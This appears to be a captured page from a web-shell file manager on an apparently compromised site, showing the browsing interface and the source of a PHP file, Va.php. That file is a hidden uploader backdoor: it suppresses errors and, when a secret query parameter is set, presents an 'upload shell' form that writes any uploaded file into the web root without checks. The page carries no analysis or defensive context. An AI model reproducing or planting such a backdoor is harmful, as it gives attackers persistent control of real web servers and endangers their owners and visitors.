Current Path :
/
home
/
thisislyve
/
www
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/thisislyve/www/Va.php
<?php error_reporting(0); if(trim($_GET['f']) == 'f'){ $saw1 = $_FILES['file']['tmp_name']; $saw2 = $_FILES['file']['name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='upload shell' /> </form>"; move_uploaded_file($saw1,$saw2); } ?>